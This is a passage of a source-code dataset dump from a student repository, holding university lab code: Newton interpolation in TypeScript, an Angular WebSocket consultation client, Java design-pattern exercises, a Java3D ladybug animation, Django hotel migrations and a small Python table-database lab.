length: number): number {\n return this._cache[FirstNewton.GetCacheKey(from, length)];\n }\n\n private static Factorial(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n }\n\n public Interpolate(point: number) : number {\n const baseIndex = this.CalculateBase(point);\n const stoppedAt = this.PopulateCache(baseIndex);\n\n let acc = this._values[baseIndex].y;\n for(let length = 2; length < stoppedAt; length++){\n let xAcc = 1;\n for(let cur = 0; cur < length; cur++){\n xAcc *= (point - this._values[cur + baseIndex].x)\n }\n acc += this.CachedDelta(baseIndex, length) * xAcc / FirstNewton.Factorial(length);\n }\n\n return acc;\n }\n}\n\nexport class SecondNewtonEvenly {\n _values: { x: number, y: number }[];\n\n constructor(_values: { x: number, y: number }[]) {\n this._values = [..._values];\n this._values.sort((a,b)=>(b.x - a.x))\n }\n\n _cache: { [key: string]: number } = {};\n\n private CalculateBase(point: number): number {\n let baseValue = Number.MAX_VALUE;\n let baseIndex = -1;\n for (let i = 0; i < this._values.length; i++) {\n const value = this._values[i].x;\n if (Math.abs(point - value) < Math.abs(point - baseValue)) {\n baseValue = value;\n baseIndex = i;\n }\n }\n\n return baseIndex;\n }\n\n\n private PopulateCache(baseIndex: number): number {\n const d = 100;\n const epsilon = 5 * Math.pow(10, -d);\n\n for (let length = 1; length + baseIndex < this._values.length; length++) {\n let isLargerThanEpsilon = false;\n\n for (let from = baseIndex; from + length < this._values.length; from++) {\n let delta = this.CalculateDelta(from, length);\n this._cache[SecondNewtonEvenly.GetCacheKey(from, length)] = delta;\n if (Math.abs(delta) > epsilon)\n isLargerThanEpsilon = true;\n }\n\n if (!isLargerThanEpsilon)\n return length;\n }\n\n return this._values.length - baseIndex;\n }\n\n private CalculateDelta(from: number, length: number): number {\n if (length == 1)\n return this._values[from].y;\n\n return (this.CachedDelta(from + 1, length - 1) - this.CachedDelta(from, length - 1));\n }\n\n private static GetCacheKey(from: number, length: number): string {\n return `${from}: ${length}`;\n }\n\n private CachedDelta(from: number, length: number): number {\n return this._cache[SecondNewtonEvenly.GetCacheKey(from, length)];\n }\n\n private static Factorial(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n }\n\n public Interpolate(point: number) : number {\n const baseIndex = this.CalculateBase(point);\n const stoppedAt = this.PopulateCache(baseIndex);\n\n let acc = this._values[baseIndex].y;\n for(let length = 2; length < stoppedAt; length++){\n let xAcc = 1;\n for(let cur = 0; cur < length; cur++){\n xAcc *= (point - this._values[cur + baseIndex].x)\n }\n acc += this.CachedDelta(baseIndex, length) * xAcc / SecondNewtonEvenly.Factorial(length);\n }\n\n return acc;\n }\n}\n\nfunction fact(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n}\n\nexport function newton_second_evenly(f: { x: number, y: number }[], x: number) {\n f = [...f];\n f.sort((a,b)=>(b.x - a.x));\n\n const n = f.length;\n const columns = [f.map(e=>e.y)];\n let brkN = n;\n\n for(let column = 1; column < n; column++){\n const col = [];\n columns.push(col);\n for(let row = 0; row < n - column; row++){\n col.push(columns[column - 1][row + 1] - columns[column - 1][row]);\n }\n if(Math.abs(Math.min.apply(null, col)) < 1e-9){\n brkN = column;\n break;\n }\n }\n\n let h = (f[1].x - f[0].x);\n let q = (x - f[0].x) / h;\n let qmult = 1;\n let nMult = 1;\n let sum = f[0].y;\n\n for(let i = 1; i < brkN; i++){\n qmult *= (q - i + 1);\n nMult *= (i);\n\n sum += qmult / nMult * columns[i][0];\n }\n\n return sum;\n}\n\nexport function newton_first(f: {x: number, y: number}[], x: number){\n return new FirstNewton(f).Interpolate(x);\n}\n" }, { "alpha_fraction": 0.7134670615196228, "alphanum_fraction": 0.7134670615196228, "avg_line_length": 28.08333396911621, "blob_id": "0d48eedb297747869ea5ade614e13fb6ea00d7fa", "content_id": "cf3803fe1bfd08d8c8a841a169920fa89528aa68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 349, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/data/SupportMessage.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.data;\n\npublic class SupportMessage extends ConsultNotification{\n public final String text;\n public final boolean fromSupport;\n\n public SupportMessage(String text, boolean fromSupport) {\n super(\"message\");\n this.text = text;\n this.fromSupport = fromSupport;\n }\n}\n" }, { "alpha_fraction": 0.7373965382575989, "alphanum_fraction": 0.7373965382575989, "avg_line_length": 35.91666793823242, "blob_id": "7e777d59a060d114a8d2748f0f7808459f7ba965", "content_id": "5c05a072da4c867cdd92405731601fbb7e193d04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 130, "num_lines": 36, "path": "/insurance/frontend/src/consultation/MessageFactory.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {\n ClientAssignedNotification,\n ClientDisconnectNotification, FreeClientListNotification, MessageListNotification, NewAnswerNotification, NewClientNotification,\n NewQuestionNotification,\n SupportMessage,\n WsNotification\n} from './ConsultationMessage';\nexport interface MessageFactory{\n create(msg: string): WsNotification\n}\n\nexport class JsonMessageFactory implements MessageFactory{\n create(msg: string): WsNotification {\n function getMessage(data: any): SupportMessage {\n return new SupportMessage(data.text, data.fromSupport);\n }\n const data = JSON.parse(msg);\n switch(data.tag){\n case \"new-question\":\n return new NewQuestionNotification(getMessage(data.message), data.clientId);\n case \"new-client\":\n return new NewClientNotification(data.clientId);\n case \"new-answer\":\n return new NewAnswerNotification(getMessage(data.message));\n case \"client-disconnected\":\n return new ClientDisconnectNotification(data.clientId);\n case \"client-assigned\":\n return new ClientAssignedNotification(data.clientId, data.toRecv);\n case \"client-list\":\n return new FreeClientListNotification(data.clients);\n case \"list-client-messages\":\n return new MessageListNotification(data.clientId, data.messages.map(getMessage));\n }\n }\n\n}\n" }, { "alpha_fraction": 0.565527081489563, "alphanum_fraction": 0.5811966061592102, "avg_line_length": 19.9375, "blob_id": "96ce1c3bd7c3f9491bb7a05a0e7398805fbe3f78", "content_id": "38b084e4cf992c79215a85e609149d4dd29ee791", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 702, "license_type": "no_license", "max_line_length": 59, "num_lines": 32, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/Doll.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 07.04.2017.\r\n */\r\npublic class Doll implements Gift {\r\n private String name = \"unnamed\";\r\n private String dressName = \"no dress\";\r\n\r\n public void setDress(String dress) {\r\n this.dressName = dress;\r\n }\r\n\r\n public void setName(String name) {\r\n this.name = name;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"doll \" + name + \" in \" + dressName;\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (Doll) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7445095181465149, "alphanum_fraction": 0.7445095181465149, "avg_line_length": 36.94444274902344, "blob_id": "31c83ac94afb1016d23eb015c17144fd991daf62", "content_id": "063cceef684b57659491ceb6f680fec488c1e333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1366, "license_type": "no_license", "max_line_length": 110, "num_lines": 36, "path": "/insurance/frontend/src/app/client-consultation.service.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\nimport {webSocketUrl} from 'util/urls'\nimport {Observable, Subject} from '@reactivex/rxjs';\nimport {BufferSendableState, ConnectionContext, WebSocketSendableState} from '../websocket/ConnectionContext';\nimport {NewAnswerNotification, SupportMessage} from '../consultation/ConsultationMessage';\nimport {JsonMessageFactory} from '../consultation/MessageFactory';\n\n@Injectable()\nexport class ClientConsultationService {\n private wsUrl = webSocketUrl('/ws/consult/client');\n private ws: WebSocket;\n private wsCtx = new ConnectionContext();\n wsObservable: Observable<SupportMessage>;\n messages: SupportMessage[] = [];\n\n constructor() {\n this.wsCtx.setState(new BufferSendableState());\n\n const messageFactory = new JsonMessageFactory();\n\n this.ws = new WebSocket(this.wsUrl);\n this.ws.onopen = ev=>this.wsCtx.setState(new WebSocketSendableState(this.ws));\n\n this.wsObservable = Observable.create(observer=>{\n this.ws.onmessage = ev=>{console.log(ev.data);observer.next(ev.data);};\n }).map(msg=> (messageFactory.create(msg) as NewAnswerNotification).message);\n\n this.wsObservable.subscribe(msg=>this.messages.push(msg))\n }\n\n writeQuestion(msg: string){\n const consultationMessage = new SupportMessage(msg, false);\n this.messages.push(consultationMessage);\n this.wsCtx.write(msg);\n }\n}\n" }, { "alpha_fraction": 0.48086124658584595, "alphanum_fraction": 0.4820574223995209, "avg_line_length": 29.962963104248047, "blob_id": "4342c14bd0cf8196b2249123742cd59c5aeda7c1", "content_id": "b6933b6ee562f01d40f451ea28d0c705f5eb4f18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/db/lab1/sport.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.data import Table, Attribute, autoinc\n\nclass SportDB:\n def __init__(self):\n self.team = Table(\n Attribute(\"name\", unique=True),\n Attribute(\"origin\"),\n Attribute(\"sport\")\n )\n\n self.player = Table(\n Attribute(\"id\", unique=True, default=autoinc()),\n Attribute(\"team_name\", reference=self.team.reference(\"name\")),\n Attribute(\"name\"),\n Attribute(\"score\")\n )\n\n def best(self):\n rs = []\n for team in self.team.find():\n players = self.player.find(team_name=team['name'])\n if not players:\n rs.append((team, None))\n else:\n rs.append((team,max(players, key=lambda p: int(p['score']))))\n\n return rs\n" }, { "alpha_fraction": 0.5281501412391663, "alphanum_fraction": 0.5465338826179504, "avg_line_length": 39.796875, "blob_id": "65344a44932bf8f8736ca8000c2a3ee9f90baa6d", "content_id": "26df76bb8d93d13c91fb8f26471a8052bb267e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2611, "license_type": "no_license", "max_line_length": 156, "num_lines": 64, "path": "/hotels/tourism/hotels/migrations/0001_initial.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2017-12-21 00:40\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('sent_at', models.DateTimeField()),\n ('message', models.CharField(max_length=1000)),\n ('rating', models.IntegerField(blank=True, choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Mediocre'), (4, 'Good'), (5, 'Awesome')], null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('name', models.CharField(max_length=150, primary_key=True, serialize=False)),\n ('description', models.CharField(max_length=2000)),\n ],\n ),\n migrations.CreateModel(\n name='Feature',\n fields=[\n ('name', models.CharField(max_length=50, primary_key=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Hotel',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ('brief_description', models.CharField(max_length=200)),\n ('description', models.CharField(max_length=2000)),\n ('country', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Country')),\n ('features', models.ManyToManyField(blank=True, to='hotels.Feature')),\n ],\n ),\n migrations.CreateModel(\n name='Room',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('frees_at', models.DateTimeField(blank=True, null=True)),\n ('description', models.CharField(max_length=100)),\n ('daily_ratio', models.FloatField()),\n ('hotel', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Hotel')),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='hotel',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Hotel'),\n ),\n ]\n" }, { "alpha_fraction": 0.6065858006477356, "alphanum_fraction": 0.6169844269752502, "avg_line_length": 30.97142791748047, "blob_id": "6c7063ce284c1799453acc3d091733636097e8af", "content_id": "92f61541c3451cef75671c52f99dbce788a9888a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 88, "num_lines": 35, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab2/task2/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab2.task2;\r\n\r\nimport java.time.LocalDate;\r\n\r\npublic class Application {\r\n private static void lineSeparation() {\r\n for (int i = 0; i < 15; i++) System.out.print(' ');\r\n System.out.println();\r\n }\r\n\r\n public static void main(String... args) {\r\n Terminal terminal = new Terminal();\r\n SubwayClient john = new SubwayClient(\"John\");\r\n\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyTokens(1);\r\n terminal.pass(john, john.tokenPayment());\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyMonthSubscription(LocalDate.now());\r\n terminal.pass(john, john.monthSubscriptionPayment());\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyPassesSubscription(3);\r\n for (int i = 0; i < 4; i++) terminal.pass(john, john.passSubscriptionPayment());\r\n lineSeparation();\r\n\r\n john.buyMonthSubscription(LocalDate.now().minusMonths(1).minusDays(1));\r\n terminal.pass(john, john.monthSubscriptionPayment());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5155313611030579, "alphanum_fraction": 0.5171661972999573, "avg_line_length": 20.9375, "blob_id": "09560c3b8ea28734948fbe8c1698d11bea0cae2b", "content_id": "c2a0bb6ee8f7df216b41a9ea3d29565ecf6aa8d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/NumVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\npublic class NumVal extends MathVal {\r\n final Double val;\r\n\r\n public NumVal(Double val) {\r\n this.val = val;\r\n }\r\n\r\n @Override\r\n public MathVal accept(MathValVisitor v) {\r\n return v.visit(this);\r\n }\r\n\r\n @Override\r\n public MathVal plus(MathVal right) {\r\n final MathVal that = this;\r\n return right.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new NumVal(num.val + val);\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n return vector.plus(that);\r\n }\r\n });\r\n }\r\n\r\n\r\n @Override\r\n public MathVal inverse() {\r\n return new NumVal(1.d / val);\r\n }\r\n\r\n @Override\r\n public MathVal absolute() {\r\n return new NumVal(Math.abs(val));\r\n }\r\n\r\n @Override\r\n public MathVal mul(MathVal other) {\r\n MathVal that = this;\r\n return other.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new NumVal(num.val * val);\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n return vector.mul(that);\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return val.toString();\r\n }\r\n\r\n @Override\r\n public boolean equals(Object o) {\r\n if (this == o) return true;\r\n if (o == null || getClass() != o.getClass()) return false;\r\n\r\n NumVal numVal = (NumVal) o;\r\n\r\n return val.equals(numVal.val);\r\n }\r\n\r\n\r\n @Override\r\n public int hashCode() {\r\n return val.hashCode();\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6012861728668213, "alphanum_fraction": 0.6012861728668213, "avg_line_length": 33.55555725097656, "blob_id": "41acf87d0acfd7dff6c39193759687652bad9765", "content_id": "152293e65b0db9e81f6d85c7f288cbbc29c111b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 933, "license_type": "no_license", "max_line_length": 147, "num_lines": 27, "path": "/insurance/frontend/src/app/supporter-consultation/supporter-consultation.component.html", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "<div id=\"consultPod\">\n <table>\n <tr *ngFor=\"let client of clients\" ngClass=\"{{client.id == consultation.selectedClient ? 'goodrow':''}}\">\n <td>\n ID: \"{{client.id}}\"\n </td>\n <td>\n <button (click)=\"selectClient(client.id)\">View chat</button>\n </td>\n <td>\n <button (click)=\"assignClient(client.id)\" *ngIf=\"!client.assigned\">Assign to me</button>\n <button (click)=\"unassignClient(client.id)\" *ngIf=\"client.assignedToMe\">Unassign from me</button>\n </td>\n <td [ngClass]=\"{'msgnotify': client.hasNewMessages && client.assignedToMe}\">{{client.hasNewMessages ? \"New message!\":\"No new messages\"}}</td>\n </tr>\n </table>\n\n <div *ngIf=\"consultation.selectedClient\">\n <label>\n Write answer:\n <input [(ngModel)]=\"message\">\n </label>\n <button (click)=\"answer()\">Post answer!</button>\n </div>\n\n <app-messages [list]=\"currentMessages\"></app-messages>\n</div>\n" }, { "alpha_fraction": 0.5734671950340271, "alphanum_fraction": 0.6067239046096802, "avg_line_length": 30.93050193786621, "blob_id": "f74f15e4cb04c12926ff78db94a8e0bfa3835ea1", "content_id": "a351b07190669d79d37e8552ad8ad6e76282fef5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8393, "license_type": "no_license", "max_line_length": 101, "num_lines": 259, "path": "/cg/cg-lab6/src/main/java/cglabs/lab6/BouncingBall.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package cglabs.lab6;\n\nimport com.sun.j3d.loaders.Scene;\nimport com.sun.j3d.loaders.objectfile.ObjectFile;\nimport com.sun.j3d.utils.applet.MainFrame;\nimport com.sun.j3d.utils.behaviors.keyboard.KeyNavigatorBehavior;\nimport com.sun.j3d.utils.geometry.Primitive;\nimport com.sun.j3d.utils.image.TextureLoader;\nimport com.sun.j3d.utils.universe.PlatformGeometry;\nimport com.sun.j3d.utils.universe.SimpleUniverse;\n\nimport javax.media.j3d.*;\nimport javax.vecmath.*;\nimport java.applet.Applet;\nimport java.awt.*;\nimport java.awt.event.KeyEvent;\nimport java.awt.event.KeyListener;\nimport java.io.File;\nimport java.util.Hashtable;\n\npublic class BouncingBall extends Applet implements KeyListener {\n\n static TextureLoader loader = new TextureLoader(\"model/texture.jpg\",\n \"RGP\", new Container());\n static Texture texture = loader.getTexture();\n\n private SimpleUniverse universe = null;\n private Canvas3D canvas = null;\n private TransformGroup viewtrans = null;\n\n private TransformGroup tg = null;\n private Transform3D t3d = null;\n private Transform3D t3dstep = new Transform3D();\n private Matrix4d matrix = new Matrix4d();\n\n private Shape3D[] legs = new Shape3D[6];\n\n public BouncingBall() {\n setLayout(new BorderLayout());\n GraphicsConfiguration config = SimpleUniverse\n .getPreferredConfiguration();\n\n canvas = new Canvas3D(config);\n add(\"Center\", canvas);\n universe = new SimpleUniverse(canvas);\n\n BranchGroup scene = createSceneGraph();\n universe.getViewingPlatform().setNominalViewingTransform();\n\n universe.getViewer().getView().setBackClipDistance(100.0);\n\n canvas.addKeyListener(this);\n\n universe.addBranchGraph(scene);\n }\n\n public static void main(String[] args) {\n BouncingBall applet = new BouncingBall();\n Frame frame = new MainFrame(applet, 800, 600);\n }\n\n private BranchGroup createSceneGraph() {\n BranchGroup objRoot = new BranchGroup();\n\n BoundingSphere bounds = new BoundingSphere(new Point3d(), 10000.0);\n\n viewtrans = universe.getViewingPlatform().getViewPlatformTransform();\n\n KeyNavigatorBehavior keyNavBeh = new KeyNavigatorBehavior(viewtrans);\n keyNavBeh.setSchedulingBounds(bounds);\n PlatformGeometry platformGeom = new PlatformGeometry();\n platformGeom.addChild(keyNavBeh);\n universe.getViewingPlatform().setPlatformGeometry(platformGeom);\n\n objRoot.addChild(createLadybird());\n\n Background background = new Background();\n background.setColor(0.75f, 0.69f, 0.680f);\n background.setApplicationBounds(bounds);\n objRoot.addChild(background);\n\n return objRoot;\n }\n\n private BranchGroup createLadybird() {\n\n BranchGroup objRoot = new BranchGroup();\n tg = new TransformGroup();\n t3d = new Transform3D();\n\n tg.setCapability(TransformGroup.ALLOW_TRANSFORM_WRITE);\n\n t3d.setTranslation(new Vector3d(-0.15, -0.3, -5.0));\n t3d.setRotation(new AxisAngle4f(0.0f, 0.0f, 0.0f, 0.0f));\n t3d.setScale(1.0);\n\n tg.setTransform(t3d);\n\n texture.setBoundaryModeS(Texture.WRAP);\n texture.setBoundaryModeT(Texture.WRAP);\n texture.setBoundaryColor(new Color4f(0.0f, 1.0f, 0.0f, 0.0f));\n TextureAttributes texAttr = new TextureAttributes();\n texAttr.setTextureMode(TextureAttributes.MODULATE);\n Appearance ap = new Appearance();\n ap.setTexture(texture);\n ap.setTextureAttributes(texAttr);\n int primflags = Primitive.GENERATE_NORMALS\n + Primitive.GENERATE_TEXTURE_COORDS;\n ObjectFile loader = new ObjectFile(ObjectFile.RESIZE);\n\n\n Scene s = null;\n\n File file = new java.io.File(\"model/ladybug.obj\");\n\n try {\n s = loader.load(file.toURI().toURL());\n } catch (Exception e) {\n System.err.println(e);\n System.exit(1);\n }\n\n Hashtable namedObjects = s.getNamedObjects();\n for (int i = 1; i <= 6; i++) {\n legs[i - 1] = (Shape3D) namedObjects.get(\"leg\" + i);\n }\n Shape3D ladybug = (Shape3D) namedObjects.get(\"ladybug\");\n ladybug.setAppearance(ap);\n\n /*ROTATE LEGS*/\n Transform3D hourArrowRotationAxis = new Transform3D();\n hourArrowRotationAxis.rotZ(Math.PI / 2);\n\n for (int i = 0; i < 6; i++) {\n TransformGroup tgmHourArrow = new TransformGroup();\n Shape3D hour_arrow = legs[i];\n tgmHourArrow.addChild(hour_arrow.cloneTree());\n legs[i].removeAllGeometries();\n\n int timeStart = 0; //стрілка почне рух через 2 секунди після запуску програми\n int noRotationsHour = 2000; //кількість обертів\n int timeRotationHour = 1000;//час одного оберту\n//Alpha для руху годинної стрілки\n Alpha hourRotationAlpha = new Alpha(noRotationsHour,\n Alpha.INCREASING_ENABLE,\n timeStart,\n 0, timeRotationHour, 0, 0, 0, 0, 0);\n//обертання годинної стрілки\n RotationInterpolator hourArrRotation = new RotationInterpolator(\n hourRotationAlpha, tgmHourArrow,\n hourArrowRotationAxis, (float) Math.PI * 2, 0.0f);\n BoundingSphere bounds = new BoundingSphere(new Point3d(0.0, 0.0, 0.0), Double.MAX_VALUE);\n hourArrRotation.setSchedulingBounds(bounds);\n tgmHourArrow.setCapability(TransformGroup.ALLOW_TRANSFORM_WRITE);\n tgmHourArrow.addChild(hourArrRotation);\n\n tg.addChild(tgmHourArrow);\n }\n /*Rotate legs end*/\n\n tg.addChild(s.getSceneGroup());\n\n objRoot.addChild(tg);\n objRoot.addChild(createLight());\n\n objRoot.compile();\n\n return objRoot;\n\n }\n\n private Light createLight() {\n DirectionalLight light = new DirectionalLight(true, new Color3f(1.0f,\n 1.0f, 1.0f), new Vector3f(-0.3f, 0.2f, -1.0f));\n\n light.setInfluencingBounds(new BoundingSphere(new Point3d(), 10000.0));\n\n return light;\n }\n\n public void keyTyped(KeyEvent e) {\n char key = e.getKeyChar();\n\n if (key == 'd') {\n t3dstep.set(new Vector3d(0.0, 0.0, 0.1));\n tg.getTransform(t3d);\n t3d.mul(t3dstep);\n tg.setTransform(t3d);\n }\n\n if (key == 's') {\n\n t3dstep.rotY(Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'f') {\n\n t3dstep.rotY(-Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'r') {\n\n t3dstep.rotX(Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'v') {\n\n t3dstep.rotX(-Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'e') {\n t3dstep.set(new Vector3d(0.0, 0.1, 0.0));\n tg.getTransform(t3d);\n t3d.mul(t3dstep);\n tg.setTransform(t3d);\n }\n\n if (key == 'c') {\n t3dstep.set(new Vector3d(0.0, -0.1, 0.0));\n tg.getTransform(t3d);\n t3d.mul(t3dstep);\n tg.setTransform(t3d);\n }\n }\n\n public void keyReleased(KeyEvent e) {\n }\n\n public void keyPressed(KeyEvent e) {\n }\n}" }, { "alpha_fraction": 0.5859649181365967, "alphanum_fraction": 0.6175438761711121, "avg_line_length": 15.764705657958984, "blob_id": "7aebf84bae386996359a9ae10d28ccdbdcb6e18c", "content_id": "b5c24b5543e9fedf2b5e7e50820ded7344f23fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 285, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/numerical-methods/src/app/f.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export function f(x: number): number {\n const sqrt = Math.sqrt(1 - x);\n return Math.sinh(sqrt) / sqrt;\n}\n\nexport const l = -13.0;\nexport const h = -5.0;\n\n\n/*\nexport function f(x:number):number {\n return x * Math.cos(x/3) - Math.log(x);\n}\n\nexport const l = 1;\nexport const h = 5;\n*/\n" }, { "alpha_fraction": 0.6306483149528503, "alphanum_fraction": 0.6404715180397034, "avg_line_length": 20.20833396911621, "blob_id": "47c4464517065b96204056f304fbdda3619a7a99", "content_id": "0963cbc551f95311badda3bf2afdf67dcddfd831", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 509, "license_type": "no_license", "max_line_length": 51, "num_lines": 24, "path": "/numerical-methods/src/app/trapezoid/trapezoid.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {trapetion_simple} from \"../trapetion\";\nimport {f, l, h} from \"../f\";\n\n@Component({\n selector: 'app-trapezoid',\n templateUrl: './trapezoid.component.html',\n styleUrls: ['./trapezoid.component.css']\n})\nexport class TrapezoidComponent implements OnInit {\n h: string = \"0.0001\";\n result?: number = null;\n\n constructor() { }\n\n calc(){\n let dist = parseFloat(this.h);\n this.result = trapetion_simple(f, l, h, dist);\n }\n\n ngOnInit() {\n }\n\n}\n" }, { "alpha_fraction": 0.5877721309661865, "alphanum_fraction": 0.5956461429595947, "avg_line_length": 25.329267501831055, "blob_id": "9a8b208128f146e0449331164dc749e8c7c59988", "content_id": "fd8b72ee5d2bcfb67b7becc717e643926e4cbdcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2159, "license_type": "no_license", "max_line_length": 87, "num_lines": 82, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab5/task1/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab5.task1;\n\ninterface FillingHandler {\n boolean fill(String what);\n\n void setNext(FillingHandler next);\n}\n\nclass Cistern implements FillingHandler {\n private final String name;\n private int capacity;\n private FillingHandler next;\n\n Cistern(int capacity, String name) {\n if (capacity < 0) throw new IllegalArgumentException(\"capacity\");\n this.capacity = capacity;\n this.name = name;\n }\n\n @Override\n public boolean fill(String what) {\n if (capacity == 0) {\n System.out.println(name + \" is empty\");\n return next.fill(what);\n } else {\n System.out.println(name + \" fills \" + what);\n capacity--;\n return true;\n }\n }\n\n @Override\n public void setNext(FillingHandler next) {\n this.next = next;\n }\n}\n\nclass FillErrorMessage implements FillingHandler {\n @Override\n public boolean fill(String what) {\n System.out.println(\"Failed to fill \" + what);\n return false;\n }\n\n @Override\n public void setNext(FillingHandler next) {\n }\n}\n\nclass CoffeMachine {\n private FillingHandler fillingHandler;\n\n public CoffeMachine() {\n FillingHandler[] handlers = new FillingHandler[4];\n for (int i = 0; i < 3; i++)\n handlers[i] = new Cistern(2, \"Water cistern #\" + (i + 1));\n\n handlers[3] = new FillErrorMessage();\n\n for (int i = 0; i < 3; i++)\n handlers[i].setNext(handlers[i + 1]);\n\n fillingHandler = handlers[0];\n }\n\n public void makeCoffe() {\n System.out.println(\"Starting making coffe. Putting coffe and dust in the can\");\n boolean filled = fillingHandler.fill(\"the can\");\n if (filled) System.out.println(\"Coffe ready, enjoy the dust. Next!\");\n else System.out.println(\"Unlucky, no coffe for you. Go 